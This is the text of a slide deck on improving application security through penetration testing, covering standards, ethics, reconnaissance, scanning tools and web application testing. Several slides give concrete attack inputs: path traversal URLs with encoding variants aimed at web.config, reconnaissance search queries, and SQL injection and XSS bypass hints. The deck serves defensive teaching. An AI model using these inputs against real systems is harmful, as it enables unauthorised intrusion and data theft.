KEMBAR78
Penetration Testing | PDF | Penetration Test | Computer Security
Scribd
Upload
2K views52 pages

Penetration Testing

This document discusses improving application security through penetration testing. It outlines the process of penetration testing including information gathering, analyzing infrastructure and machines, vulnerability scanning, and testing web applications. The goals are to simulate an attacker to assess risks and security controls. The testing follows standards and ethics, and provides a report on findings and countermeasures.

Uploaded by

starone
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
2K views52 pages

Penetration Testing

This document discusses improving application security through penetration testing. It outlines the process of penetration testing including information gathering, analyzing infrastructure and machines, vulnerability scanning, and testing web applications. The goals are to simulate an attacker to assess risks and security controls. The testing follows standards and ethics, and provides a report on findings and countermeasures.

Uploaded by

starone
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 52

Improving Application Security

through Penetration Testing

Dominick Baier (dbaier@ernw.de)


Security Consultant / BS 7799 Lead Auditor
ERNW GmbH
Outline

• What is Penetration Testing and Auditing


• Standards and Ethics
• The Process of Testing
• Pen-Testing Web Applications
• The Tools

2
"Improving the Security of Your Site by
Breaking Into it"
(Dan Farmer/Wietse Venema, 1993)
http://www.fish.com/security/admin-guide-to-cracking.html

3
Penetration Testing vs. Auditing

• Penetration Testing
- Simulating a motivated attacker for a specific amount of time
- Black Box / White Box Approach
- Is more like a snapshot of the current security of a system or a
business process

• Auditing
- Analyzing
• Configuration Files
• Architecture
• Source Code
- Policy conformance
• Operational Plans and Procedures

4
Why Penetration Testing

• To measure the security of a system, network or a business


process
- By a third party

• To assess possible Risks

• To make the upper management "security aware"

5
Possible Goals of a Penetration Test

• How much information about our network is publicly


available ?
• Is it possible to compromise this and that system ?
• Is it possible to disturb business process X ?
• How effective work our security controls ?
- Firewall
- AntiVirus / Spam / Content Filter
- Intrusion Detection Systems
• Is our Information Security Policy correctly enforced ?
• Can employees compromise workstation security?

• "Are we safe ?"

6
What can be tested

• Servers and Workstations


- Web Server
- Database Server
- Domain Controller
- Workstations
• Infrastructure
- Network Devices
- Wireless Networks
- Dial-In Access
- VPNs
• Applications
• Employees (Social Engineering)

7
Attackers to simulate

• Outside Attackers
- Script Kiddies
- Competitors
- Terrorists
- Journalists

• Insiders
- Employees
- Disgruntled Employees
- Contractors
- Consultants

8
Standards

• Pete Herzogs's OSSTM


"Open Source Security Testing Methodology Manual"
- Very practical approach
- Checklists of what and in which order to test
- List of tools

• ISO 17799 / BS 7799 Standard for Information Security


- Focuses more on the policy and paper work side of security
- Extensive catalog of security controls
- Defines a standard for audits

• NIST Guidelines for Network Security Testing

9
Ethics

• Findings are under strict NDAs

• No information gathered during the test


- is sent in clear text over the internet
- is used for personal profit

• ISACA Code of Professional Ethics


• ISC 2 Code of Ethics

• Full Disclosure

10
The STRIDE Threat Model

• STRIDE
- Spoofing Identity
- Tampering with data
- Repudiation
- Information Disclosure
- Denial of Service
- Elevation of Privilege

11
The Pen-Tester's Mantra

• Segregation of Duties
• Minimal Machine
• Least Privilege
• Patch-Level
• Defense in Depth
• Secure the Weakest Link
• Strong Authentication

12
Course of Actions

• Opening Meeting
- Goals of the Pen-Test
- Scope
- Responsible Admins

• The Audit / Test itself

• The Report
- Found issues
- Countermeasures
- Prioritization

• Closing Meeting

13
Stages of a Pen-Test

• Gathering Information
• Analyzing the Infra-Structure
• Analyzing the Machines
- Fingerprinting
- Port / Vulnerability-Scanning
- Attacking the System / Proof of Concept
• Analyzing Applications
- Functional / Structural Analysis
- Attacking Authentication and Authorization
- Attacking Data and Back-End Communication
- Attacking Clients

14
Information Gathering

• In this phase you try to compile as much publicly available


information as possible

- Internic
- IANA / RIPE
- Whois
- Google / Usenet
- Private homepages of employees
- Email Addresses
- Telephone numbers

15
16
17
Information Gathering

• Google Search-Syntax

- allintitle:"Index of /etc"
- site:gov site:mil site:ztarget.com
- filetype:doc filetype:pdf filetype:xls
- intitle:, inurl:, allinurl:
- allinurl:mssql, allinurl:gw …
- inurl:".aspx?ReturnUrl="
- "+www.ernw.+de"
- related:www.ernw.de
- login site:www.microsoft.com
- [cached]

18
19
20
21
22
23
24
Information Gathering

• Mailing-Lists / Forums / Usenet


- Some vendors even post internal support questions to public
newsgroups

25
Information Gathering

• Mailing-Lists / Forum / Usenet

Invitation?

26
Analyzing the Infra-Structure and Machines

• A layered modell

Data Data

Application Application

Service Service

OS OS

Network

27
Analyzing the Infra-Structure and Machines

• The Reality

Auth
Data
Database

LDAP

HTTP DCOM SOCKETS

CORBA

Web Application Database


Browser Server Server Server

Web Audit
Content Logs

28
Analyzing the Infra-Structure and Machines

• Querying System and DNS Information


• Portscanning
• Fingerprinting
• Vulnerability Scanning
• Exploiting a Vulnerability

29
Querying System and DNS Information

• TraceRoute
- Tracing the network route give you information about
• The provider
• Type of connection
- Simple / Redundant / Load Balanced
- At which hop gets ICMP blocked?

30
Querying System and DNS Information

• DNS Zone transfer


- DNS Server should be configured to allow Zone Transfers only
to specific peers
- DNS Zones are very interesting
• Which machines are listed in the Zone
• Get information about IP network-structure

31
Portscanning & Fingerprinting

• Port Scanning gives you information about which ports a


machine listens on
• Every open port is potentially vulnerable
• More advanced scanners try to figure out what kind of
software (+ vendor and version) is installed

• Most popular Port Scanners


- SuperScan (www.foundstone.com)
- NMAP (www.insecure.org/nmap)

32
Banner Grabbing

• Connect with Netcat or Telnet to a service


• You will often get detailed information

33
Vulnerability Scanner

• Automated scanners that check for known vulnerabilities


- They often give you more information for vulnerability
investigation

• There are vulnerability and exploit databases on the internet


- SecurityFocus (www.securityfocus.com)
- Packet Storm (www.packetstormsecurity.com)

34
Vulnerability Scanner

• System / Host Scanner


- Nessus (www.nessus.org)
- Retina (www.eeye.com)
- ISS Security Scanner (www.iss.net)
- Microsoft MBSA (www.microsoft.com)

• Database Scanner
- MetaCoreTex (www.metacoretex.com)
- AppSecInc AppDetective (www.appsecinc.com)
- ISS Database Scanner (www.iss.net)

• Web Server Scanner


- Nikto (www.cirt.net)

35
Vulnerability Investigation

• www.securityfocus.com/bid

36
Vulnerability Investigation

• www.packetstormsecurity.org

37
Pen-Testing Web Applications

• Visualize the HTTP Traffic


- Sniffer (e.g. Ethereal)
- Web Proxies
• Achilles (http://packetstormsecurity.nl/web/achilles-0-27.zip)
• Fiddler (www.fiddlertool.com)
• WebProxy (www.atstake.com)
- Hand craft HTTP Requests
• Wfetch & Tinyget (IIS6 Resource Kit)

Page Path Auth? SSL? GET/POST Comment


Index.aspx / N N

login.aspx /login/ N Y POST Login Page

about.aspx /about/ N N Email


Addresses

38
Structural Analysis

• ...or graphical

39
Pen-Testing Web Applications

• Try some URLs


- Common Directories
• /html, /images, /jsp, /cgi
- "Hidden" Directories
• /admin, /secure, /adm, /management
- Backup and Log Files
• /.bak, /backup, /back, /log, /logs, /archive, /old
- Include Files
• /include, /inc, /js, /global, /local
- Lokalized Versions
• /de, /en, /1033
- trace.axd

• Look at the HTTP Status Codes


- Everything besides 404 ist interesting

40
Pen-Testing Web Applications

• Look for
- Cascading Style Sheets (.css)
- XML Dateien / XML Stylesheets (.xml / .xsl)
- JavaScript Dateien (.js)
- Include Files (.inc)
- Text Dateien (.txt)
- Comments
- Client-Side Validation
- Forms
• Hidden Fields
• Password Fields
• MaxLength Attributes

41
Pen-Testing Web Applications

• "Odd" Query Strings

www.site.com/show.aspx?content=marketing.xml
www.site.com/UserArea/default.php?UserID=5
www.site.com/dbsubmit.php?Title=Mr&Phone=123
www.site.com/menu.asp?sid=73299

• Cookie values

42
Canonicalization Errors

• Popular Examples
- Apache WebServer
• /scripts und /SCRIPTS
- Microsoft IIS 5
• ../ and .%2e%2f
- ISS Firewall
• action=delete and action=%64elete
- Microsoft IE4
• Dotless IP Bug

- ASP.NET Authorization Canonicalization Bug


• http://localhost/formsec/secure%5csecret.aspx

43
Resource Names

• Example

http://server/cms/show.aspx?file=content.xml

• Can I use this page to show other files?

http://server/cms/show.aspx?file=../web.config

• Try some variations

http://server/cms/show.aspx?file=../web.config.
http://server/cms/show.aspx?file=../web.config::$DATA
http://server/cms/show.aspx?file=..%5cweb.config
http://server/cms/show.aspx?file=..%255cweb.config
http://server/cms/show.aspx?file=..%%35%63web.config

44
Testing for SQL Injection

• Try if you can inject SQL code in forms


• If the programmer simply concatenates user input with SQL
statements a database compromise is most likely possible

• Try to generate errors


- Insert a ' character
- Does the application behave different ?
- Is maybe even a database error returned ?

• You can execute nasty statements through SQL Injection


- Union
- Drop...
- XP_CMDSHELL

45
Testing for Cross Site Scripting

• Cross Site Scripting let's an attacker inject script code in Web


Pages
• This happens when the Application directly outputs client
input whithout proper HTML encoding
• Can be hard to find - look in
- Query Strings
- Form Fields
- HTTP Headers

• Enables Cookie Stealing / Harvesting Attacks

• Many Developers rely on ASPX's ValidateRequest


- Try <%00...> encoding

46
Tools

• Automatic Mirroring of Web Sites


- wget (www.gnu.org/directory/wget.html)
- Black Widow (www.softbytelabs.com)
- Teleport Pro (www.tenmax.com)

• Web Scanner
- WebInspect (www.spidynamics.com)
- NStealth (www.nstalker.com)

• ASP.NET Specific Scanners


- ASP.NET Security Analyzer (www.owasp.org)
- ASP.NET Shared Hosting Analyzer (www.owasp.org)

47
Conclusion

• Pen-Testing is no Black Magic


• Very systematic procedure

• If you follow the 7 golden rules, you can eliminate most of the
vulnerabilities

• Do regular Pen-Tests or Audits - you can only benefit


- Internal and third party

48
• Questions ?

you can download the slides from www.leastprivilege.com

49
Links

• OSSTM
- www.isecom.org
• NIST Draft Guidelines to Network Security Testing
- http://csrc.nist.gov/publications/drafts/security-testing.pdf
• ISC 2 Code of Ethics:
- https://www.isc2.org/cgi/content.cgi?category=12
• ISACA Code of Professional Ethics
- http://www.isaca.org/Template.cfm?Section=Code_of_Ethics1

50
Links

• Wfetch
- (http://download.microsoft.com/download/d/e/5/de5351d6-
4463-4cc3-a27c-3e2274263c43/wfetch.exe)
• NetCat
- http://www.atstake.com/research/
tools/network_utilities/nc11nt.zip)

51

You might also like